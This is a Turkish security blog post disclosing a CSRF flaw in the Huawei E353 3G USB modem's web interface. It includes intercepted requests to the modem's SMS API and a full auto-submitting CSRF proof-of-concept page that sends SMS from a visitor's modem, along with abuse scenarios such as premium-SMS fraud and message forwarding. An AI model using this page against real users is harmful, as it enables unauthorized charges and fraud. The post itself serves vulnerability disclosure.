

Huawei E353 CSRF Zafiyeti

written by Mert SARICA | 2 May 2016

Geçtiğimiz Haziran ayının ortasına kadar 2.5 Kg ağırlığında nur topu gibi bir dizüstü bilgisayara sahiptim. Bu nedenle sabahları işe giderken, akşamları içen dönerken veya bir cafede otururken biraz makale okumak istedığimde ağırlığı ve büyülüğu nedeniyle onu yanında taşıyamıyordum. Onun yerine sim kart girişine sahip, hafif ve portatif Android tabletim yillardır işimi görüyordu. Tablet kullandığım için, 2-3 yıl önce Turkcell'den data hattı satın alırken yanında verilen Huawei marka E353 model 3G USB modemi (Turkcell VINN) çok kullanma fırsatım olmamıştı. Haziran ayından sonra ise ultrabook satın aldığım için tabletimle yollarımı ayırarak 3G modemi aktif olarak kullanmaya başladım.



3G USB modemler, yanında dizüstü bilgisayar taşıyan ve güvenlik kaygısı nedeniyle güvenliliklerinden şüphe ettiği kablosuz ağlara bağlanmak istemeyen bilişimciler için büyük bir nimettir. 3G USB modemin aslında bilgisayarımıza bağladığımız, üzerinde yönetilebilir olmayan bir işletim sisteminin çalıştığı, kapalı bir kutu olduğunu ve onun da zafiyetleri olabileceğini çoğu zaman aklımızın ucuna getirmeyiz.

Modemi sıkça kullanmaya başladıkten sonra boş bir zamanımda modeme hızlıca göz atmaya ve canımı acıtabilecek ilk zafiyeti tespit ettikten sonra gerisini incelemek üzere sizlere havale etmeye karar verdim.

3G modemi taktığımde karşıma otomatik olarak açılan modem web arayüzüne incelemeye başladım. Yaptığım ilk iş sayfanın kaynak kodlarına ve oradan da sayfa üzerinde kullanılan JavaScript kodlarını incelemek oldu. JavaScript

kodlarını incelediğimde, modeme ajax çağrıları ile çeşitli komutlar gönderilebildiğini gördüm.



COPYRIGHT (C) 2006-2012 HUAWEI TECHNOLOGIES CO.,LTD TÜM HAKLARI SAKLIDIR.

Thu 12:37

TURKCELL VINN – Iceweasel

192.168.1.1/html/traffic.html

İstatistikler

Tür	Anlık kullanım	Toplam kullanım
İndirilen Veri	7.2 MB	9.24 GB
Gönderilen Veri	352.95 KB	755.45 MB
Toplam Veri	7.55 MB	9.97 GB
Bağlantı süresi	00:57:36	100:38:45

Yukarda sağlanan veri istatistikleri yalnızca yaklaşık değerlerdir, lütfen kesin miktar için aşağıdaki linkten data paketinizden kalan miktarı kontrol ediniz.

Data paketinizden kalan miktar öğrenmek için lütfen [tıklayın](#) ! Bilgilendirme size ücretsiz sms olarak iletilicektir.

Turkcell Faturalı VINN hattınıza data paketi almak için [tıklayın](#) !

Turkcell Faturasız VINN hattınıza data paketi almak için [tıklayın](#) !

```
Applications ▾ Places ▾ Iceweasel ▾ Thu 13:55
http://www....m/csrf.html x TURKCELL VINN x http://192.168.1.1/js/sms.js - Iceweasel
view-source:http://192.168.1.1/js/sms.js x + Search
Most Visited ▾ Offensive Security Kali Linux Kali Docs Kali Tools Exploit-DB Aircrack-ng
{
    sms_initPage();
}
else
{
    showInfoDialog(common_failed);
});
}
else
{
    var refreshStatus;
    showWaitingDialog(common_waiting, "<span>" + sms_hint_sending+"</span>&ampnbsp"+"1/" + g_sms_num*(PhoneArray.length));
    $(".wait_dialog_btn").show();
    $("#sms_dialog").remove();
}

//var submitData = object2xml("request", submitXmlObject);
//$.ajax({
//    url: "api/sms/send-sms",
//    type: "POST",
//    data: submitData,
//    success: function(response) {
//        var ret = response;
//        var sendTotalCount = ret.TotalCount;
//        var currentSendIndex = ret.CurIndex;
//        var currentSendPhone = ret.Phone;
//        var sendSuccessPhones = ret.SuccessPhone;
//        var sendFailPhones = ret.FailPhone;
//        var statusContent = "<span>" + sms_hint_sending + "</span>&ampnbsp" + currentSendIndex + "/" + sendTotalCount;
//        $(".wait_table_content .wait_str").html(statusContent);
//        if(currentSendPhone == ""){
//            $(".wait_table").remove();
//            clearInterval(refreshStatus);
//            var succeededArray = sendSuccessPhones.split(",");
//            var succeededTotal = succeededArray.length;
//            var failedArray = sendFailPhones.split(",");
//        }
//    }
//});
```

traffic.html sayfasında yer alan “Data paketinizden kalan miktarı öğrenmek için tıklayın” kısmına tıkladığımda, data hattımından 2222 numaralı telefon numarasına KALAN smsi gittiğini gördüm. Daha sonra bunun tam olarak nasıl gerçekleştiğini görmek için trafiği Burp Suite PRO aracı ile incelemeye karar verdim.

The screenshot shows the Burp Suite Professional interface. In the main pane, there is a table of network requests. One specific POST request to '/api/sms/send-sms' is highlighted with a yellow background and has a checkmark in the 'Params' column. Below the table, the 'Request' tab is selected, showing the raw HTTP request:

```

POST /api/sms/send-sms HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: /*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.1/html/traffic.html
Content-Length: 217
Connection: close
Pragma: no-cache
Cache-Control: no-cache

```

The request body contains XML data:

```

<?xml version="1.0" encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>2222</Phone></Phones><Sca><Content>KALAN</Content><Length>5</Length><Reserved>1</Reserved><Date>2016-01-07 18:27:24</Date></request>

```

A context menu is open over the selected request, with the 'Engagement tools' option expanded. The 'Generate CSRF PoC' option is highlighted.

Dikkatimi ilk çeken nokta, yapılan isteklerde Cross-Site Request Forgery (CSRF) saldırısına karşı herhangi bir önlemin alınmamış olmasıydı.

Cross-Site Request Forgery (CSRF) saldırısını kısaca, kullanıcının haberi ve bilgisi olmadan, internet tarayıcısının hedef alınan web uygulamasına doğru isteklerde bulunmasını sağlamaktır.

Örneğin kullanıcı hacklenmiş bir X haber sitesini ziyaret ediyor ve bu site üzerinden saldırgan, kullanıcının modeminin DNS değiştirme sayfasına (örnek: 192.168.1.1/dns.php) kullanıcısının haberi ve bilgisi olmadan DNS adresini 1.2.3.4 olarak güncelle şeklinde istek (HTTP POST) gönderiyor. Bu sayede artık kullanıcının tüm DNS istekleri, art niyetli kişinin DNS sunucusu üzerinden gerçekleşiyor ve kullanıcı gitmek istediği web sitesi yerine art niyetli kişinin web sitesine yönlendirilebiliyor.

Bu CSRF zafiyeti, istismar eden art niyetli kişiler ve dolandırıcılar tarafından nasıl kötüye kullanılır diye düşündüğümde aklıma ilk gelen, 3G modeme art niyetli kişilerin kontrolü olan bir web sitesi üzerinden premium SMS servislere SMS gönderilmesi sağlanarak haksız kazanç sağlanabileceği geldi. Bunun dışında diyelim ki ayrı bir data hattınız yok ve mevcut sim kartınızı 3G modeminiz ile kullanıyorsunuz. Bu durumda art niyetli kişiler, sms yönlendirme servisi ile size gönderilen smsleri başka bir telefon numarasına yönlendirebilirler. Bu senaryoları çoğaltmak mümkün olduğu için hızlıca, pratikte bunu kötüye kullanmak ne kadar kolay diye kendi cep telefonuma CSRF ile web sitesi üzerinden SMS atarak kontrol etmek istedim.

Burp Suite PRO ile gelen Generate CSRF PoC özelliği ile herhangi bir isteği çok kolay bir şekilde CSRF zafiyetini istismar eden bir web forma aşağıdaki gibi dönüştürebilirsiniz. Bu şekilde bir form oluşturup bunu web siteme (<https://www.mertsarica.com/csrf.html>) yükledim.

CSRF PoC generator

Request to: http://192.168.1.1

Raw Params Headers Hex XML

```
POST /api/sms/send-sms HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.1/html/traffic.html
Content-Length: 217
Connection: close
Pragma: no-cache
Cache-Control: no-cache

<?xml version="1.0"
encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>05_____</Phone></Phones><Sca></Sca><Content>Test</Content><Length>5</Length><Reserved>1</Reserved><Date>2016-01-07 18:27:24</Date></request>
```

CSRF technique:

- Auto-select based on request features
- URL-encoded form
- Multipart form
- Plain text form
- Cross-domain XHR (modern browsers only)
- Include auto-submit script

?

Type a search term 0 matches

CSRF HTML:

```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional --&gt;
&lt;body&gt;
&lt;script&gt;
function submitRequest()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://192.168.1.1/api/sms/send-sms", true);
    xhr.setRequestHeader("Accept", "*/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    var body = "\x3c?xml version=\\"1.0\\"
encoding=\\"UTF-8\\"\?\x3e\x3crequest\x3e\x3cIndex\x3e-1\x3c/Index\x3e\x3cPhones\x3e\x3cPhone\x3e05_____ \x3c/Phone\x3e\x3c/Phones
\x3e\x3cSca\x3e\x3c/Sca\x3e\x3cContent\x3e\x3c/Test\x3c/Content\x3e\x3cLength\x3e5\x3c/Length\x3e\x3cReserved\x3e1\x3c/Reserved\x3e\x3c
Date\x3e2016-01-07 18:27:24\x3c/Date\x3e\x3c/request\x3e";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i &lt; aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
submitRequest();
&lt;/script&gt;
&lt;form action="#"&gt;
    &lt;input type="button" value="Submit request" onclick="submitRequest();"/&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>


?



Type a search term 0 matches



Warning: The XMLHttpRequest technique only works on modern browsers, and the browser will not display the response to the CSRF request. The request contains some non-standard headers which, if included in a cross-domain XHR, may cause the request to be pre-flighted, and so the attack may fail. These headers have been omitted in the PoC attack, to avoid pre-fighting. If the omitted headers are essential for the efficacy of the CSRF attack, you can manually add these to the PoC HTML.



Regenerate Test in browser Copy HTML Close


```

Applications ▾ Places ▾ Iceweasel ▾

Thu 12:38

Iceweasel

http://www....m/csrf.html

www.mertsarica.com/csrf.html

Most Visited ▾ Offensive Security Kali Linux Kali Docs Kali Tools Exploit-DB Aircrack-nm

Submit request

File Edit View Help

```

1 <html>
2 <!-- CSRF PoC - generated by Burp Suite Professional -->
3 <body>
4 <script>
5   function submitRequest()
6   {
7     var xhr = new XMLHttpRequest();
8     xhr.open("POST", "http://192.168.1.1/api/sms/send-sms", true);
9     xhr.setRequestHeader("Accept", "*/*");
10    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
11    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
12    xhr.withCredentials = true;
13    var body = "<?xml version='1.0' encoding='UTF-8'?><request><Index><1/><Phones><Phone>05</Phone></Phones><Sca><Content>Test</Content><Length>5</Length><Reserved>1</Reserved><Date>2016-01-0718:27:24</Date></request>";
14    var aBody = new Uint8Array(body.length);
15    for (var i = 0; i < aBody.length; i++)
16      aBody[i] = body.charCodeAt(i);
17    xhr.send(new Blob([aBody]));
18  }
19  submitRequest();
20 </script>
21 <form action="#">
22   <input type="button" value="Submit request" onclick="submitRequest();"/>
23 </form>
24 </body>
25 </html>
26

```

Daha sonra bu adresi 3G modem ile internet bağlandığım bilgisayarımdan çağrırdığımıda ise cep telefonuma SMS geldi ve oyun bitmiş oldu :)

Applications ▾ Places ▾ Burp-StartBurp ▾

Thu 12:39

Burp Suite Free Edition v1.6.32

Burp Intruder Repeater Window Help

Target Proxy Spider Scanner Intruder Repeater Sequencer Decoder Comparer Extender Options Alerts

Intercept HTTP history WebSockets history Options

Filter: Hiding CSS, image and general binary content

Host	Method	URL	Params	Edited	Status	Length	MIME type	Extension	Title	Comment	SSL	IP	Cookies
http://192.168.1.1	GET	/config/groups/language.xml			200	316	XML	xmll			192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/converged-status			200	19564	script	js			192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/status			200	831	XML				192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/traffic-statistics			200	547	XML				192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/check-notifications			200	330	XML				192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/status			200	831	XML				192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/traffic-statistics			200	547	XML				192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/check-notifications			200	330	XML				192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/status			200	831	XML				192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/traffic-statistics			200	547	XML				192.168.1.1		
http://192.168.1.1	GET	/api/monitoring/check-notifications			200	330	XML				192.168.1.1		
http://192.168.1.1	POST	/api/sms/send-sms		✓	200	213	XML				192.168.1.1		

Request Response

Raw Params Headers Hex XML

```

POST /api/sms/send-sms HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0
Accept: */
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.mertsarica.com/csrf.html
Content-Length: 223
Origin: http://www.mertsarica.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache

<?xml version="1.0" encoding="UTF-8"?><request><Index><1/><Phones><Phone>05</Phone></Phones><Sca><Content>Test</Content><Length>5</Length><Reserved>1</Reserved><Date>2016-01-0718:27:24</Date></request>

```

?

< > + > Type a search term

0 matches



Bu zafiyete karşı ne yapabilirim diye soracak olursanız, Turkcell ve/veya Huawei ile iletişime geçip bu zafiyeti ortadan kaldırın bir yama var mı diye sorabilir, varsa yükleyebilir veya bu modemi çöpe atıp farklı bir modem ile yolunuza devam edebilirsiniz.

Unutmayın, nasıl kullanmış olduğumuz işletim sistemimizin güvenlik yamalarının güncel olmasını güvenliğimiz için önem veriyorsak, aynı şekilde kullanmış olduğumuz aygıtların, cihazların da donanım yazılımlarının,

yamalarının güncel olduğuna önem vermeliyiz.

Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.